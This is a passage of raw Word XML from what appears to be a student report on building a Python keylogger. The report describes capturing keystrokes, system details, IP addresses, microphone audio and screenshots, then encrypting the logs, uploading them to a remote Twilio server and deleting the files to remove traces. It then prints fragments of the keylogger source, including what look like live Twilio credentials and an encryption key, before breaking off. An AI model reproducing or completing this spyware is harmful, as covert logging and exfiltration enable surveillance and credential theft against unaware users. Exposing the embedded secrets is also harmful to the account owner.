      <w:r w:rsidRPr="0021409D">
        <w:t>implement</w:t>
      </w:r>
      <w:r>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidRPr="0021409D">
        <w:t xml:space="preserve"> audio capture</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075110E9" w14:textId="4CDA283F" w:rsidR="0021409D" w:rsidRPr="0021409D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 xml:space="preserve">Understanding and implementing </w:t>
      </w:r>
      <w:r>
        <w:t>the connection and data transfer in a remote Twilio data server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188E2CD0" w14:textId="69F60DEB" w:rsidR="0021409D" w:rsidRPr="004D19E6" w:rsidRDefault="0021409D" w:rsidP="00983598">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Time Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8EB565" w14:textId="49A65338" w:rsidR="004D19E6" w:rsidRDefault="004D19E6" w:rsidP="00983598">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc149301455"/>
      <w:r>
        <w:t>Proudest Moments</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="1216D0BB" w14:textId="6CD71C67" w:rsid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Coding complex python programs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> using new and complex python functions and libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C8F0F6" w14:textId="20B8C23F" w:rsidR="00A11274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Implementation of audio capture</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the key logger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCF50EA" w14:textId="5B734C42" w:rsidR="00A11274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Set</w:t>
      </w:r>
      <w:r>
        <w:t>ting</w:t>
      </w:r>
      <w:r w:rsidRPr="00A11274">
        <w:t xml:space="preserve"> up </w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00A11274">
        <w:t xml:space="preserve"> remote Twilio server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762653EA" w14:textId="486B86C3" w:rsidR="00A11274" w:rsidRP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Idea about implementing encryption and decryption mechanism for more added security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D1DA4E" w14:textId="5E699DB9" w:rsidR="004D19E6" w:rsidRDefault="004D19E6" w:rsidP="00983598">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc149301456"/>
      <w:r>
        <w:t>Hurdles</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="72EEA72B" w14:textId="48410D82" w:rsidR="004D19E6" w:rsidRDefault="004D19E6" w:rsidP="00983598">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Implementation of sending the key logs via EMAIL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C04671" w14:textId="739906FE" w:rsid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>The reason as to why this couldn’t be implemented was from 2022</w:t>
      </w:r>
      <w:r w:rsidR="0021409D">
        <w:t xml:space="preserve"> or early 2023</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, for a normal GMAIL user, there is a setting called </w:t>
      </w:r>
      <w:r w:rsidR="0021409D" w:rsidRPr="0021409D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Allow Less Secure App</w:t>
      </w:r>
      <w:r w:rsidR="0021409D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0021409D">
        <w:t>which has been revoked from the interface to set up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CAE9A3" w14:textId="04BEC44F" w:rsidR="0021409D" w:rsidRDefault="0021409D" w:rsidP="00983598">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>For sending via EMAIL, I had to enable this setting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9400D1" w14:textId="77777777" w:rsidR="0021409D" w:rsidRDefault="0021409D" w:rsidP="0021409D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60BC62F0" wp14:editId="02F83E13">
            <wp:extent cx="4749377" cy="3088726"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="1105420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0920" name="Picture 11054209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969" cy="31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4526" w14:textId="72E245E2" w:rsidR="0021409D" w:rsidRDefault="0021409D" w:rsidP="0021409D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc149301544"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00983598">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Less secure app access </w:t>
      </w:r>
      <w:r w:rsidR="00983598">
        <w:t>revoked.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="39BED554" w14:textId="02BAC4CA" w:rsidR="004D19E6" w:rsidRDefault="004D19E6" w:rsidP="00983598">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Till Week 6, I was looking for alternative mechanisms to achieve this as in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20504A50" w14:textId="61E6B60D" w:rsidR="004D19E6" w:rsidRDefault="004D19E6" w:rsidP="00983598">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Use other email providers instead of GMAIL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5845119B" w14:textId="68D8CA16" w:rsidR="004D19E6" w:rsidRDefault="004D19E6" w:rsidP="00983598">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use dodgy third-party email settings (which would result in a compromised </w:t>
      </w:r>
      <w:r w:rsidR="00A11274">
        <w:t>account!</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F33BA2" w14:textId="21040EB0" w:rsidR="00A11274" w:rsidRPr="004D19E6" w:rsidRDefault="00A11274" w:rsidP="00983598">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Get a Google Cloud account (but it was paid!) as the setting isn’t deprecated yet (until end of this year)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DE70D3" w14:textId="51E21BE5" w:rsidR="00A11274" w:rsidRDefault="00A11274" w:rsidP="00983598">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Implementation of capturing clipboard data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB09984" w14:textId="054F04F3" w:rsidR="00A11274" w:rsidRP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lastRenderedPageBreak/>
        <w:t xml:space="preserve">The reason as to why this couldn’t be implemented was there is Python function called </w:t>
      </w:r>
      <w:r w:rsidRPr="00A11274">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>win32clipboard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>that is used to retrieve clipboard text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5D9340" w14:textId="053D6550" w:rsid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 xml:space="preserve">To use this library, I need to install </w:t>
      </w:r>
      <w:r w:rsidRPr="00A11274">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>pywin32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>library module which is Windows OS specific.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFFE792" w14:textId="29206BBD" w:rsidR="004D19E6" w:rsidRP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>The environment / laptop that I worked on for this project is Mac OS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C8EF6D" w14:textId="6D538619" w:rsidR="00B93F64" w:rsidRDefault="00B93F64" w:rsidP="00983598">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc149301457"/>
      <w:r w:rsidRPr="008A59D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="2E4D5A6A" w14:textId="77777777" w:rsidR="00837BD2" w:rsidRPr="008A59D5" w:rsidRDefault="00837BD2" w:rsidP="00E6398F">
      <w:p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The code structure is separated into two sections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5C30E6" w14:textId="77777777" w:rsidR="00837BD2" w:rsidRPr="008A59D5" w:rsidRDefault="00837BD2" w:rsidP="00E6398F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Implementation of the Key Logger (</w:t>
      </w:r>
      <w:r w:rsidRPr="008A59D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>keylogger.py</w:t>
      </w:r>
      <w:r w:rsidRPr="008A59D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C543F2" w14:textId="161DBD36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System information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D98962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10-second audio recording</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9454FC" w14:textId="1D09EF5A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Screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA24A16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Running the key logger for three cycles to record key logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B0D7C4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File encryption for system information and key records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F39E77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Uploading these encrypted files to a distant Twilio server and delivering SMS notifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A4C84E" w14:textId="1DA4F9D5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Remove all signs of activity by removing produced files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B7AFD4" w14:textId="0582CAA5" w:rsidR="00837BD2" w:rsidRPr="008A59D5" w:rsidRDefault="00837BD2" w:rsidP="00E6398F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Implementation of the Encryption &amp; Decryption Mechanism (encryption-decryption folder)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2950F2F5" w14:textId="77777777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  <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>encryptionkey.py</w:t>
      </w:r>
      <w:r w:rsidRPr="008A59D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to produce the encryption key that is needed to encrypt files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B84DBA" w14:textId="01EE2D6A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 encrypted files are decrypted using </w:t>
      </w:r>
      <w:r w:rsidRPr="008A59D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>decryptionfiles.py</w:t>
      </w:r>
      <w:r w:rsidRPr="008A59D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E012D52" w14:textId="77777777" w:rsidR="00837BD2" w:rsidRPr="008A59D5" w:rsidRDefault="00837BD2" w:rsidP="00E6398F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A97C4BE" w14:textId="3BD4D637" w:rsidR="00482E49" w:rsidRPr="008A59D5" w:rsidRDefault="00482E49" w:rsidP="00E6398F">
      <w:p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To run the programmes, follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13040270" w14:textId="6B93E7C3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Run encryptionkey.py to produce the encryption key that will be stored in the encryption_key.txt file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3795A607" w14:textId="50CEE17B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Paste the key into this file and make changes to keylogger.py line 51 and decryptionfiles.py line 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8294AC" w14:textId="3BABEA87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Check that your laptop's privacy and security options are enabled (Accessibility, Input Monitoring, Screen Recording).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A678FB6" w14:textId="695B9F43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Execute </w:t>
      </w:r>
      <w:r w:rsidRPr="008A59D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>keylogger.py.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE5BBC7" w14:textId="32FC431F" w:rsidR="0003095F" w:rsidRPr="008A59D5" w:rsidRDefault="0003095F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These are the 4 files that will be </w:t>
      </w:r>
      <w:r w:rsidR="00482E49" w:rsidRPr="008A59D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>produced</w:t>
      </w:r>
      <w:r w:rsidRPr="008A59D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB86A21" w14:textId="564418C0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Syseminfo.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F10F8C8" w14:textId="2FE7AF8D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Key_log.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C93C42C" w14:textId="03AACA2F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Audio.wav</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1ED108" w14:textId="3DE0F753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Screenshot.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090D80EC" w14:textId="12A7CC70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Once generated, 2 encrypted files that will be generated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6619354E" w14:textId="0519080C" w:rsidR="00482E49" w:rsidRPr="008A59D5" w:rsidRDefault="00482E49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e_key_log.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD437A8" w14:textId="7B429E6D" w:rsidR="00482E49" w:rsidRPr="008A59D5" w:rsidRDefault="00482E49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e_systeminfo.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250414A3" w14:textId="0C51DAC9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The 4 produced files will then be removed from the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E48B52C" w14:textId="768ECE8F" w:rsidR="00482E49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Execute</w:t>
      </w:r>
      <w:r w:rsidR="0003095F" w:rsidRPr="008A59D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A59D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>decryptionfiles.py.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6445E1A9" w14:textId="2EA0ACD8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 decrypted text of </w:t>
      </w:r>
      <w:r w:rsidRPr="008A59D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>e_key_log.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="008A59D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="008A59D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>e_systeminfo.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="008A59D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be created in </w:t>
      </w:r>
      <w:r w:rsidRPr="008A59D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>decryption.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4D16A9" w14:textId="77777777" w:rsidR="00482E49" w:rsidRPr="008A59D5" w:rsidRDefault="00482E49" w:rsidP="00E6398F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48002196" w14:textId="741608BC" w:rsidR="00482E49" w:rsidRPr="008A59D5" w:rsidRDefault="00482E49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Keylogger.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE2386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#Written by Vandana Rao Emaneni z5451278</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049A21E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#Code References are taken from Udemy Courses,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Youtube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Tutorials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28128E8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AF1B59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interact with OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CF592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os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0E9D544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work with time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B76A2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proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4B70611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perform socket programming - to connect 2 nodes in a network to communicate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314A748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proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1065DEA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#To secure and accept passwords </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1A69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getpass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2356067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#Get information related to the platform on which the program is running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3642E88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platform</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3FDF996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#Record and play audio signals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000DB34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sounddevice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proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="28A38BF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optimise signal strengths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253DBFD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scipy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wavfile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write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF5E0F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#Make get/post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netwrok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requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC53F1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requests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get</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D127F3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#Copy contents of screen for screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A758B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PIL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ImageGrab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5403485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#Twilio Data related libraries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFBD02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twilio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rest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Client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036C729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#For encryption &amp; decryption, implementation of symmetric authenticated crypto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72757E5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207DE91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#Control and monitor input devices (mouse, keyboard)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1963E47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pynput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keyboard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Listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284032D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41EA85B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#Files setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D18BF1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"key_log.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196851C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"syseminfo.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52168A3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"audio.wav"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C09BD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"screenshot.png"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09288F9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74190B3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#Encrypted Files setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD1014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"e_key_log.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102A934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"e_systeminfo.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C61C5B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DEAE80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#Audio setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D439A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microphone_time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10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B363E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15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540B5D6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number_of_iterations_end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530BB1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2B5CC0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#Twilio Account setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136211B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account_sid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"AC0960b5d0c34e7b0606ffcafe1cd85fbd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344DC6F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auth_token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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"dbfe2e69a6b62a2d5f38c24c70daaecf"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D7A2E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account_sid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auth_token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991BE0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getpass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getuser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2733F64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F7BAC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#Encryption key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setup :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Generate and paste the key from the encryption-decryption folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168A196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"w4eLP7fMuJwYoRJyqbpfkn2LSQNWYiDNy2KooG26SSE="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFCC44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E02C56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#File path destination to store the generated files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5C436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Keylogger"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D91D2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"/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E39F94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</w:p>
    <w:p w14:paraId="011D9B6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7DE5F4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#System Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FA29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computer_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10241CD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"a"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5473F22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gethostname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F1D678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IPAddr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gethostbyname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61AA4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try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735F8F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public_ip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"https://api.ipify.org"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001080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9D89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"Public IP Address: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public_ip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2B8940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except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Exception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5E13E85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"Couldn't get Public IP Address (most likely max query"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CC5785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"Processor: "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> + (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processor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()) + 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EA5C16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"System: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system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"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version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7F937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"Machine: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machine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EC794F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"Hostname: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A9AD3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"Private IP Address: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IPAddr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D67757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795E26"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>computer_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511552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4FBAE2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microphone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4655D05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48000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6527355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seconds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microphone_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C36DF6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"Devices available:"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query_devices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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5024D86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query</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>_devices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308F599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device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'MacBook Air Microphone'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066CABB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myrecording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267F99"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>int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seconds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> *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samplerate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channels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204EF6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wait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62617E1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myrecording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12FF8C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microphone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866ABE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5DD81B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#Screenshots </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC5A67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1290E9E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ImageGrab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grab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C6AB46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im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save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4980A6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7D38DE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9F775C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#Setup of number of times the keylogger must run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556E99E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0F14073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0E66AFD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</w:p>
    <w:p w14:paraId="147393A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#3 iterations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F5613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while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number_of_iterations_end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50A031A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A3151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2C9CF0D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1BD02B8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=[</w:t>
      </w:r>
      <w:proofErr w:type="gram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C23394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0E58509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global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</w:p>
    <w:p w14:paraId="6D17E8B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Key:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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key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946F7F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2A2950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723BAAB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6104C3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&gt;=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A4A082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352745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write_file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EA7620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=[</w:t>
      </w:r>
      <w:proofErr w:type="gram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3668318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write_file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5642095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"a"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E6C8E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5B0B8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95E26"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>replace</w:t>
      </w:r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797848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find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"space"</w:t>
      </w:r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AC3D62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5FB8F5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EB6585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AF00DB"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>elif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find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"Key"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>) == -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467DEB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FD8F07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8E167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35FFC7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70C1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>esc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309AA9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70C1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385A2CC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7675601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70C1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF3D48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82D233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join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6AD15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092F053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with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open(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="00800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+ extend +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8000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, "w") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE883F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    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="008000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
